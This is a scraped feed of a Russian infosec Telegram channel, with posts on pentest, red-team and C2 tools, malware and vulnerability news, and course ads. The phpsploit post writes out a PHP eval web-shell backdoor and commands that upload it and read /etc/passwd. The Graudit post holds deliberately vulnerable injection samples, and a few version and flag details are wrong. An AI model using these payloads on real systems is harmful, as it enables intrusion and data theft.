codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34787

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

Telegram Extractor

Telegram Extractor - Это набор скирптов которые помогут анализировать данные хранящиеся в Telegram.

💡Справка:
⏺️tgnet-extractor.py - Извлекает файл files/tgnet.dat, содержащий IP-адреса датацентра, главные секреты и т. д. Этот скрипт анализирует файл и выводит все значения на стандартный вывод
⏺️message-extractor.py - Извлекает сообщения из байтов, хранящихся в столбце SQLite messages.data Telegram.
⏺️encrypted-chat-extractor.py - Извлекает информацию из байтов, хранящихся в sqlite-столбце enc_chats.data Telegram, который содержит основной секретный ключ auth_key секретного чата и другие данные.

📎Установка:

git clone https://github.com/tsusanka/telegram-extractor.git

cd telegram-extractor


📌Использование:
python3 tgnet-extractor.py [PATH_TO_FILE]

python3 message-extractor.py [PATH_TO_FILE]

python3 encrypted-chat-extractor.py [PATH_TO_FILE]


К сожалению, получить доступ к файлу вы должны вручную. По умолчанию, этот файл храниться в /data/data/org.telegram.messenger, но для доступа, видимо, нужен root.

Читать полностью…

Codeby

🗣️ «Без воды, с практикой, с поддержкой»

🗣️ «Весь материал закрепляется на практике, преподаватели реально помогают, а курс — без воды. Чувствуешь, как прокачиваешься с каждым модулем».

🗣️ «Порадовало, что есть тестовые зоны для отработки, и темы реально актуальные — ничего лишнего».


Спасибо за честный и подробный отзыв на курс «Анализ защищенности инфраструктуры на основе технологий Active Directory»!
Мы ценим обратную связь от студентов и всегда рады видеть, что обучение приносит пользу! 😎

📎 Читать полный отзыв

Новый поток стартует с 18 августа!
👉 Присоединиться!

Читать полностью…

Codeby

MITRE Caldera

Платформа, разработанная для упрощения автоматизации имитации действий злоумышленников, помощи красным командам и автоматизации реагирования на инциденты. Создана на основе фреймворка MITRE ATT&CK™ и является активным исследовательским проектом MITRE.

💡Варианты использования
⏺️Автономные действия красной команды
Оригинальный сценарий использования Caldera. Можно использовать этот фреймворк для создания конкретного профиля угрозы (противника) и запустить его в сети, чтобы увидеть, где вы можете оказаться уязвимы. Это подходит для проверки защищенности и обучения синих команд обнаружению угроз.

⏺️Автономное реагирование на инциденты
Автоматическое реагирование на инциденты с помощью развернутых агентов. Это полезно для выявления TTP-атак, которые другие инструменты безопасности могут не замечать или блокировать.

⏺️Выполнение заданий красной команды
Проведение оценки красной команды вручную с использованием агента Manx. Это удобно для замены или дополнения существующих наборов инструментов для оценки вручную, поскольку фреймворк можно расширить с помощью любых имеющихся у вас инструментов.

⏺️Исследования в области искусственного интеллекта
Caldera можно использовать для тестирования искусственного интеллекта и других алгоритмов принятия решений с помощью плагина Mock. Плагин добавляет смоделированных агентов и смоделированные ответы, которые можно использовать для имитации всей операции.

Фреймворк состоит из двух компонентов:
1️⃣ Ядро системы. Это базовый код, состоящий из того, что доступно в репозитории. В него входит асинхронный сервер управления и контроля (C2) с REST API и веб-интерфейсом.

2️⃣ Плагины. Отдельные репозитории расширяют возможности базовой платформы и предоставляют дополнительные функции. В качестве примеров можно привести агентов, отчетность, наборы TTP и многое другое.

💻Установка
Рекурсивно клонируем репозиторий, указав нужную версию/релиз в формате x.x.x. Это позволит получить все доступные плагины. Устанавливаем зависимости и запускаем сервер.

git clone https://github.com/mitre/caldera.git --recursive --tag x.x.x
cd caldera
pip3 install -r requirements.txt
python3 server.py --insecure --build

После запуска необходимо зайти по пути http://localhost:8888, используя учетные данные по умолчанию red/admin. Затем перейти в раздел Plugins -> Training и пройти обучающий курс в стиле CTF, чтобы научиться пользоваться Caldera.

❗️Команда Caldera настоятельно рекомендует размещать сервер Caldera в безопасной среде/сети и не подключать его к интернету. Сервер Caldera не имеет защищенного и тщательно протестированного интерфейса веб-приложения, а только базовые функции аутентификации и безопасности.

Читать полностью…

Codeby

Чем меньше правил, тем крепче сон. Знакомо?

Когда в инфраструктуре десятки межсетевых экранов (NGFW/UTM) от разных вендоров, а их политики безопасности –настоящий лабиринт, где заблудится даже админ. Голова закипает 🤯

Продукт Купол.Управление от вендора НОТА (ИТ-Холдинг Т1) — это мультивендорный контроль, управление сложной сетевой инфраструктурой с возможностью выявить аномалии в политиках межсетевых экранов.

Решение позволяет:
оптимизировать правила в сетевой инфраструктуре,
обеспечить их контроль и соответствие определенным требованиям,
гарантировать безопасность.

Помимо контроля и управления межсетевыми экранами и их правилами, функционал продукта позволяет выявлять правила, которые по тем или иным причинам не сработали.

Купол.Управление — единая платформа для мониторинга, оптимизации и защиты сети.

Возможности системы:
— Подключение и контроль доступности устройств различных вендоров: Cisco,Ideco, Check Point, Fortinet и других.
— Интеграция со сторонними системами управления безопасностью (SIEM, SOAR).
— Создание профилей пользователей и администраторов с гибкой политикой доступа.
— Бэкапирование конфигураций устройств по расписанию.

И это не все. Подробнее о том, как работает Купол.Управление, читайте на сайте: https://kupol.nota.tech/kupol-control

Информация о рекламодателе.

Читать полностью…

Codeby

⚠️ Каждый уровень OSI — потенциальный вход для хакера

Если хотите разобраться, как данные бегают по сети, какие протоколы могут быть атакованы, и что происходит при обычной загрузке сайта — читайте гайд, где мы проходимся по всем 7 уровням модели OSI с примерами, угрозами и практическими выводами для ИБ.

📈 От домена до битов в кабеле — узнаете, где зарыты самые распространённые уязвимости и почему без сетевых знаний вы просто щёлкаете интерфейс, а не проводите пентест.

👉 Читайте и учитесь думать как инженер:
«Основы сетей для начинающих в ИБ: без модели OSI ты слеп»

Разобрались в теории? Вот с чего стоит начать практику:
👉 Курс по компьютерным сетям с 1 сентября — начни обучение этой осенью по скидке!

Читать полностью…

Codeby

🟧Попробуйте разгадать зашифрованные слова из мира пентеста и информационной безопасности.

Помните, «Величайший враг спрячется там, где вы будете меньше всего искать», поэтому ищите лучше!

Делитесь своими ответами и размышлениями в комментариях😎

Читать полностью…

Codeby

Binsider

Binsider — швейцарский нож для реверсёров. Инструмент для анализа бинарных файлов ELF, который предлагает мощные средства статического и динамического анализа.

💡Харакетеристики:
⏺️Статический анализ - Позволяет анализировать структуру ELF, включая секции, сегменты, символы и перемещения.
⏺️Динамический анализ - Возможность выполнения бинарного файла и отслеживания системных вызовов, сигналов и потока выполнения программы.
⏺️Извлечение строк - Подобно команде strings, Binsider может извлекать строки из бинарного файла для поиска интересных данных, таких как URL, пароли и другая чувствительная информация.
⏺️Hexdump - Предоставляет структурированный просмотр бинарного содержимого с возможностью анализа в шестнадцатеричном формате.

📎Установка:

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh #Установка Rust

sudo apt install cargo

cargo install binsider

sudo cp /home/kali/.cargo/bin/binsider /bin


Использование:
binsider [PATH_TO_BINFILE]

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебPDF-библиотека

🎢 Категория РазноеРекурсия

Приятного хакинга!

Читать полностью…

Codeby

phpsploit: Мощный фреймворк для пентеста PHP-приложений

phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.


Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.

⬇️Установка и использование:

1️⃣ Установка phpsploit:
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit


2️⃣ Настройка подключения:
set TARGET http://example.com/vulnerable.php
set BACKDOOR <?php eval($_POST['cmd']); ?>
run exploit


3️⃣ Основные команды:
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями


4️⃣ Пример эксплуатации:
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html


Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров

Читать полностью…

Codeby

👍 GitDorker

Инструмент, написанный на Python, который использует GitHub Search API и обширный список GitHub-дорков, составленных из различных источников, для поиска конфиденциальной информации, хранящейся на GitHub.

Основной целью является предоставление пользователю чистой и адаптированной поверхности атаки для сбора конфиденциальной информации на GitHub. GitDorker можно использовать с дополнительными инструментами, такими как GitRob или Trufflehog, для получения более точных результатов.

❗️Инструмент из-за использования GitHub Search API ограничен 30 запросами в минуту. Для предотвращения сбоев в него встроена функция ожидания после каждых 30 запросов.

📁 В папке Dorks находится список дорков. Рекомендуется использовать файл medium_dorks.txt при работе с инструментом. Данный файл содержит в общей сложности 240 отдельных дорков с различных ресурсов.

Для работы с инструментом также потребуется персональный токен GitHub. Установка осуществляется через следующие команды:

git clone https://github.com/obheda12/GitDorker.git
cd GitDorker
pip3 install -r requirements.txt


✔️Пример использования
Представленный ниже запрос будет искать информацию связанную с "codeby".
python3 GitDorker.py -tf TOKENSFILE -q codeby -d Dorks/DORKFILE -o output.txt

⏺️-tf импорт токена;
⏺️-q указывает на сам запрос;
⏺️-d содержит путь до словаря с дорками;
⏺️-o выходной файл с результатами.

Кроме того можно указать дополнительную информацию с помощью флагов -org, -u и т.д., чтобы сузить диапазон поиска и увеличить количество шансов на успех.

Читать полностью…

Codeby

Сеть алкомаркетов «Винлаб» столкнулась с беспрецедентным инцидентом. Приостановлена работа всех магазинов «Винлаб».

Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании уже третий день подряд.

Последствия атаки:
🟣Все розничные точки остаются закрытыми, на дверях размещены уведомления о «технических работах» без конкретных сроков возобновления деятельности
🟣Официальный сайт сети недоступен
🟣Клиенты столкнулись с «зависшими» заказами — оплаченный заказ не доставляется и статусы не обновляются

❗️Владелец сети (Novabev Group) пока не даёт официальных комментариев. По данным инсайдеров, хакеры потребовали выкуп, но руководство отказалось выполнять их условия.

Читать полностью…

Codeby

Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну

Если в вашей программе есть CMP + JE — её уже взломали.
Но что если заменить проверку пароля на хаотичные прыжки, шифрование и ложные исключения?

В статье разберем нестандартные способы защиты:
⚪️Пароль = ключ дешифровки — без него код просто не соберётся.
⚪️Ловушки для отладчика — SEH, антитрассировка и ложные CMP.
⚪️Самомодифицирующийся код — программа меняет себя при каждом запуске.
⚪️Пароль из кусочков — собирается только в памяти и никогда не хранится целиком.

📍Чем больше хаоса, тем меньше шансов у реверсера.

➡️Читайте подробнее в новой статье!

Читать полностью…

Codeby

🟧Перед вами профессиональный кроссворд для пентестеров и security-специалистов. Здесь собраны ключевые термины из мира взлома и защиты.
Решите его и напишите спрятанное слово в комментариях!

Читать полностью…

Codeby

AdaptixC2

Adaptix — это инструмент, который помогает специалистам по безопасности тестировать системы на уязвимости. Он позволяет им эмулировать действия злоумышленников после того, как они получили доступ к системе.

💡Характиристика:
Гибкость - Утилита позволяет операторам настраивать профили в формате JSON для управления аутентификацией и конфигурацией серверных ответов.
Архитектура сервер/клиент - Поддержка многопользовательского взаимодействия.
Кроссплатформенный GUI - Клиентская часть написана на C++ с использованием QT (т.е он доступен для Linux,Windows,MacOS)
Шифрование - Все коммуникации между сервером и клиентом полностью зашифрованы.
Расширяемость клиента - Возможность добавления новых инструментов.
Хранение задач и работ - Удобное управление задачами и работами.
Поддержка прокси - Socks4, Socks5 и Socks5 Auth.
Портовое переадресация - Локальная и обратная поддержка.
Поддержка BOF - Возможность использования BOF (Binary Object Format).
Мониторинг состояния агентов - Проверка состояния агентов и контроль времени работы.

📎Установка:

git clone https://github.com/Adaptix-Framework/AdaptixC2.git

cd AdaptixC2

sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz 

sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz

sudo ln -s /usr/local/go/bin/go /usr/local/bin/go


📌Использование:
⏺️Сборка серверной части:
make server

make extenders

⏺️Запуск:
cd dist

openssl req -x509 -nodes -newkey rsa:2048 -keyout server.rsa.key -out server.rsa.crt -days 3650

./adaptoxserver --profile profile.json

Сборка клиентской части:
make client

Читать полностью…

Codeby

Готовы пройти собеседование на OSINT-специалиста с Катей Тьюринг?

🟧 СЕГОДНЯ в 19:00 (мск)
🟧 Регистрация

Что обсудим?
🟧Как читать OSINT-вакансии между строк и где их искать
🟧Типичные ошибки кандидатов на собесах — и как их избежать
🟧Что реально проверяют: от теории до практических кейсов

Не пропустите! 😎
🟧 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Читать полностью…

Codeby

👯‍♀️Сигма, сигма… правила!

Sigma rule - это правила корреляции для обнаружения подозрительных или вредоносных событий в логах информационных систем, написанное в специальном унифицированном формате Sigma.

🔎 Sigma-правила описываются на языке YAML и состоят из структурированных блоков: метаинформации, источника логов (logsource) и условий детектирования (detection).

🖥 Главная особенность Sigma - независимость от конкретной SIEM-системы: одно правило можно автоматически конвертировать в запросы для разных SIEM-платформ (например, Splunk, Elastic, ArcSight), что облегчает обмен знаниями и ускоряет внедрение новых сценариев обнаружения угроз. Sigma-правила активно используются для автоматизации выявления атак и инцидентов информационной безопасности.

↔️ Благодаря независимости от конкретного продукта, Sigma-правила приняты за стандарт по обмену знаний и взаимодействию с другими специалистами по информационной безопасности (в частности, TI и IR специалистами) в области обнаружения кибератак. Некоторые из вендоры в своих отчетах по расследованию APT-группировках помимо индикаторов компрометации, описывают Sigma-правила для внедрения в свою инфраструктуру.

⤵️ Совсем скоро мы подробно окунемся в структуру Sigma-правил, а пока что в комментариях попробуйте угадать, в каком российском продукте используются Sigma-правила

Читать полностью…

Codeby

FLARE-FLOSS: Детектор скрытых угроз в бинарных файлах

Представьте, что перед вами скомпилированная программа — тёмный лес из байтов, где могут прятаться зловредные строки, пароли, URL-адреса вредоносных серверов или даже целые скрипты. Как их найти, если исходного кода нет?

FLARE-FLOSS (Fast Library Acquisition for String Sections) — инструмент от Mandiant (ныне часть Google Cloud), который вытаскивает спрятанные строки из исполняемых файлов, даже если они зашифрованы или обфусцированы.


🔴 Зачем нужен FLOSS?
Многие вредоносные программы (и даже легальные приложения) прячут важные строки:
▪️Команды для C2-серверов
▪️Ключи шифрования
▪️Ссылки на дополнительные payload-ы
▪️Системные пути и имена процессов для антиотладки
Обычные утилиты вроде strings не всегда справляются, особенно если данные закодированы или динамически собираются в памяти. FLOSS решает эту проблему, применяя статический анализ и эмуляцию кода.

⤵️ FLOSS использует три метода извлечения строк:
▪️Обычный поиск (как `strings`) – находит ASCII и Unicode-строки.
▪️Анализ стековых строк – восстанавливает строки, которые собираются в рантайме (например, через mov или `push`).
▪️Эмуляция кода – выполняет статическую эмуляцию, чтобы выявить строки, которые создаются динамически.

📍 Допустим, у нас есть вредоносный файл malware.exe. Запустим FLOSS:
floss malware.exe

И увидим что-то вроде:
...
0x401020: http://malicious-server.com/payload.bin
0x4020A0: ThisIsASecretKey123
0x4033F0: C:\Windows\System32\wscript.exe
...

Эти строки могли быть скрыты от обычного strings, но FLOSS их нашёл!

📍 Установка и использование
Способ 1: Через pip
pip install flare-floss


Способ 2: Из исходников
git clone https://github.com/mandiant/flare-floss  
cd flare-floss
python3 setup.py install


Проверим установку
floss --version


Базовые команды
# Простой анализ  
floss suspicious_file.exe

# Только статические строки (без эмуляции)
floss --no-static-strings malware.bin


🔴 Иногда могут возникать проблемы из-за конфликтов в окружении. Создайте чистое виртуальное окружение и используйте FLOSS дальше:
python3 -m venv ~/floss-venv
source ~/floss-venv/bin/activate
pip install flare-floss

Читать полностью…

Codeby

💿 OSINT в багхантинге: зачем багхантеру разведка?

Вы можете быть мастером эксплуатации, но если не знаете, где копать — ничего не найдете.
Всё начинается с OSINT: поддомены, утекшие ключи, старые Jenkins, забытые API — всё это может быть входом.

В новой статье рассказываем:
🟧 как багхантер собирает карту инфраструктуры без единого запроса к серверу;
🟧 какие утечки ищут в GitHub и Google Dorks;
🟧 как искать реальные уязвимости через Shodan и HaveIBeenPwned;
🟧 почему OSINT — это не “дополнительно”, а фундамент атаки.

И да, всё на реальных кейсах.
🟧 Ныряем в багхантинг с головой — читайте статью!

Хотите так же анализировать инфраструктуру цели, находить утечки и строить полноценные OSINT-цепочки?
🟧 Разберитесь в инструментах и подходах на практическом курсе по OSINT. Начать обучение сейчас

Читать полностью…

Codeby

Arch Linux удалил три пакета из AUR, распространявших троян CHAOS

1️⃣В чём суть?
В популярном репозитории AUR (Arch User Repository), который используется миллионами пользователей Arch Linux и производных дистрибутивов (Manjaro, EndeavourOS и др.), обнаружен вредоносный пакет. Злоумышленники внедрили в него троян CHAOS, способный похищать конфиденциальные данные пользователей.

2️⃣Как назывались эти пакеты?
librewolf-fix-bin, firefox-patch-bin и zen-browser-patched-bin загружали вредоносный код с GitHub.

3️⃣Что за троян CHAOS?
CHAOS RAT — это троян удаленного доступа с открытым исходным кодом, разработанный для Windows и Linux. Он может: 1)Загружать и скачивать файлы. 2) Выполнять произвольные команды. 3) Открывать обратную оболочку для удаленного управления.

4️⃣Чем всё закончилось?
Пакеты были загружены 16 июля пользователем с ником danikpapas и успели повисеть в AUR два дня, после чего Arch Linux оперативно их удалила.

📌Рекомендации для пользователей!
Если вы устанавливали данные пакеты, срочно исполните следующие инструкции:
1) Проверите систему на наличие подозрительного исполняемого файла systemd-initd, который может находиться в директории /tmp.
2) Убедесь, что система не была скомпрометирована, проверив сетевые подключения и другие признаки вредоносной активности.

Читать полностью…

Codeby

Платформа DION — это не просто альтернатива привычным мессенджерам и видеосвязи. Это решение, где информационная безопасность встроена на уровне архитектуры.

Варианты размещения:

— Гибридное. Позволяет выносить медиатрафик и критичную информацию в контур заказчика.
— On-Premise. Развёртывание на стороне заказчика, локальное хранение, максимальная изоляция.

💻 Что важно для ИБ-специалистов:

— Шифрование и MFA.
— Интеграция с DLP и SIEM.
— Гибкий контроль доступа. Ролевые политики, настройка по отделам, проектам и уровням доступа.
— Безопасное хранение, резервное копирование и устойчивость к атакам.
— Обучение сотрудников для снижения человеческого фактора.

📌 DION — это не надстройка, а изначально безопасная UC-платформа.

Как её уже используют лидеры рынка?

🔘Один из ТОП-5 банков проводит 15 000+ защищённых конференций в день
🔘Крупнейший медиахолдинг применяет DION для прямых включений корреспондентов
🔘Ведущая авиакомпания сократила время переключения между каналами и бронирует переговорки через DION.Rooms

📤 Попробуйте бесплатно.
Для компаний от 120+ пользователей — спецусловия.

Информация о рекламодателе.

Читать полностью…

Codeby

Ваши данные уже в сети. Вы уверены, что они в безопасности?

Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов

Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга

92% людей не контролируют свой цифровой след — будьте в меньшинстве!
🔴 Начать обучение запись до 31 июля!

По всем вопросам @Codeby_Academy

Читать полностью…

Codeby

Пентестеру важно понимать DNS и его записи, чтобы выявлять инфраструктуру, скрытые сервисы и уязвимости, проверять защиту почты и находить возможности для атак. Это помогает эффективно планировать атаки и искать слабые места в безопасности.

Читать полностью…

Codeby

Взламываем мифы о безопасности Android

Знаете ли вы:

🟧85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🟧Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🟧Атаки на Android выросли на 50% за последние 2 года — (данные Kaspersky Lab), пора научиться защищаться!

На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:⬇️
Разберете Android-приложения изнутри
Освоите инструменты статического и динамического анализа
Научитесь находить и устранять уязвимости на практике

21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий

🟠Успейте записаться

Курс создан для:
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений

🚀 По всем вопросам пишите @Codeby_Academy

Читать полностью…

Codeby

Extirpater

Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.

💡Харакетеристики:
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.

📎Установка:
👩‍💻Проект доступен в магазине F-droid:

https://f-droid.org/packages/us.spotco.extirpater/

👩‍💻Исходный код:
https://github.com/divested-mobile/extirpater


📌Использование:
Выбирете Primary или Secondary Storage и нажмите кнопку Start.

Читать полностью…

Codeby

pspy: Утилита для мониторинга процессов без привилегий root

pspy — это лёгкий и мощный инструмент с открытым исходным кодом, который позволяет отслеживать процессы на Linux-системах без необходимости обладания правами root. Это идеальный инструмент для анализа выполнения задач в реальном времени, поиска уязвимостей и оптимизации системных процессов.


Основные возможности pspy
➡️ Мониторинг процессов в реальном времени:
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
➡️ Отслеживание задач cron:
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
➡️ Поддержка работы без root:
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
➡️ Совместимость с различными архитектурами:
• Доступен для x64, x86, ARM и других платформ.
➡️ Лёгкость и портативность:
• Выполняется как один бинарный файл без дополнительных зависимостей.

⬇️ Установка и использование

1️⃣ Скачивание pspy:
Загрузите подходящую версию с GitHub:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64


2️⃣ Запуск мониторинга:
Для наблюдения за процессами выполните:
./pspy64


3️⃣ Фильтрация событий:
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
./pspy64 | grep cron

Читать полностью…

Codeby

📱 Google выпустил срочное обновление, закрывающее шесть критических уязвимостей в браузере Chrome. Среди них особую опасность представляет CVE-2025-6558 (оценка 8.8 по шкале CVSS), которая уже активно используется злоумышленниками в реальных атаках.

Суть проблемы кроется в компонентах ANGLE (Almost Native Graphics Layer Engine) и GPU браузера. ANGLE выполняет важную функцию - это промежуточный слой между движком рендеринга Chrome и графическими драйверами устройства. Ошибка в проверке входящих данных позволяет злоумышленникам осуществить так называемый «побег из песочницы».


🟧 Что это означает на практике?
- Достаточно просто открыть специально созданную веб-страницу
- Никаких дополнительных действий от пользователя не требуется
- Атакующий получает возможность выйти за пределы изолированной среды браузера
- Появляется риск полного компрометирования системы

🟧 Особую тревогу вызывает факт обнаружения этой уязвимости специалистами Google Threat Analysis Group (TAG) - подразделения, которое занимается расследованием сложных кибератак, часто связанных с деятельностью государственных хакерских группировок. Уязвимость была зафиксирована 23 июня 2025 года, но Google подтверждает, что эксплойты уже используются в реальных атаках.

🟧Это уже пятая критическая уязвимость в Chrome с начала 2025 года, которую эксплуатируют злоумышленники:
🟧CVE-2025-2783 - ошибка в логике на пересечении Chrome и операционной системы Windows, которая позволяет обойти защиту песочницы браузера.
🟧CVE-2025-4664 - случай недостаточного обеспечения соблюдения политики в компоненте под названием Loader.
🟧CVE-2025-5419 - уязвимость чтения и записи за пределами в движке V8 JavaScript и WebAssembly.
🟧CVE-2025-6554 - недостаток путаницы типов в движке V8 JavaScript и WebAssembly.
🟧Текущая CVE-2025-6558 - неправильная проверка ненадежного ввода в компонентах ANGLE и GPU браузера.

🟧 Что делать?
- Обновите Chrome до версии 38.0.7204.157/.158 (для Windows и macOS) и 138.0.7204.157 (для Linux)
Проверить наличие обновлений можно через меню: «Еще» > «Справка» > «О Google Chrome»

- Не забывайте, что аналогичные обновления необходимо устанавливать и для других браузеров на базе Chromium: Edge, Brave, Opera, Vivaldi

Читать полностью…

Codeby

Intellifuzz

Intellifuzz - умная AI-powered обёртка для веб-фаззера ffuf. Автоматически анализирует цель и предлагает оптимальные расширения файлов для фаззинга, используя силу искусственного интеллекта от ведущих провайдеров.

💡Харакетеристики:
⏺️Множественные AI-провайдеры - OpenAI, Anthropic Claude, Ollama (локально), OpenRouter.
⏺️Управление конфигурацией - YAML-конфиг с интерактивной настройкой.
⏺️Интеграция с ffuf - Пропускает все параметры ffuf без изменений.
⏺️Умные предложения - Контекстно-зависимые рекомендации расширений файлов.
⏺️Гибкая аутентификация - API-ключи, переменные окружения, локальные модели.

📎Установка:

git clone https://github.com/cansolele/intellifuzz

cd intellifuzz

pip install -r requirements.txt

Заходим на сайт openAI под другой страной и в API Platforms, в настройках пользвателя cоздаём секретный ключ, называем проект как угодно и вставляем его в файл config.yaml


📌Использование:
python intellifuzz.py https://google.com


Удовольствие такое не бесплатное, за использование API просят плату

Читать полностью…

Codeby

Graudit: инструмент для поиска уязвимостей в коде

Graudit (Grep Rough Audit) — это инструмент для статического анализа безопасности исходного кода, который использует сигнатурный поиск на основе регулярных выражений. Он помогает находить потенциальные уязвимости, такие как SQL-инъекции, XSS, RCE, path traversal и другие. Graudit отличается простотой, высокой скоростью работы и поддержкой множества языков программирования.


🟧 Установка Graudit
Graudit можно установить из репозитория:
git clone https://github.com/wireghoul/graudit
cd graudit
sudo cp graudit /usr/local/bin/ # Добавляем в PATH
Проверяем:
graudit -v

🟧 Как работает Graudit?
Graudit анализирует исходный код, используя предопределённые наборы правил (сигнатуры), которые соответствуют распространённым уязвимостям.
Поддерживаемые языки:
🟧 PHP, Java, Python, Ruby
🟧 C/C++, Go, JavaScript
🟧 Bash, Perl, ASP
Файлы с сигнатурами хранятся в папке /signatures/.

🟧 Примеры использования
1. Базовое сканирование
Проверим PHP-код на уязвимости:
graudit -d php ./project/

Вывод будет содержать строки кода, похожие на уязвимые паттерны.
2. Поиск SQL-инъекций
graudit -d sql ./project/
3. Проверка JavaScript (Node.js) на XSS
graudit -d js ./app.js


🟧 Пример уязвимого кода и его анализ
🟧 PHP: SQL-инъекция
// Уязвимый код
$user = $_GET['username'];
$query = "SELECT * FROM users WHERE name = '$user'";
$result = mysqli_query($conn, $query);

Graudit обнаружит эту уязвимость, так как в сигнатурах PHP есть правило для SQL-запросов с прямым включением пользовательского ввода.

🟧 Python: Command Injection
import os
user_input = input("Enter filename: ")
os.system(f"cat {user_input}") # Уязвимость!
Graudit выдаст предупреждение, так как os.system с внешними данными — это риск RCE.

🟧
Расширение возможностей Graudit
Можно добавлять свои сигнатуры в /signatures/custom.db:
Пример правила для поиска опасных функций в Pythonlabel: Dangerous Python eval()pattern: eval\(.*\$
Теперь при сканировании Python-кода Graudit будет искать eval().

🟧 Используйте Graudit в связке с:
🟧 Bandit (для Python)
🟧 Semgrep (для глубокого анализа)
🟧 SonarQube (для комплексного сканирования)

Читать полностью…

Codeby

▶️ Друзья, уже через час стартует бесплатный вебинар «Как пройти собеседование на OSINT-специалиста: от резюме до реальных кейсов» с Катей Тьюринг!

Вы еще успеваете присоединиться! 😎
🔴 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy

Читать полностью…

Codeby

BCHackTool

BCHackTool — это программа, в которой собрано большое количество популярных утилит. В эту подборку вошла уже известная нам утилита как Zphisher. Утилита также ориентирована для Termux.

💡Характиристика:
⏺️Компактность - Популярные утилиты в одном месте
⏺️Удобство - Утилита сама устанавливает утилиты
⏺️Простота - Утилита имеет некую удобную оболочку для взаимодейтсвия

📎Установка:

git clone https://github.com/ByCh4n/BCHackTool.git

cd BCHackTool/

chmod +x bchacktool.sh


Использование:
sudo bash ./bchacktool.sh

Выбираем нужную нам утилиту.

Читать полностью…
Subscribe to a channel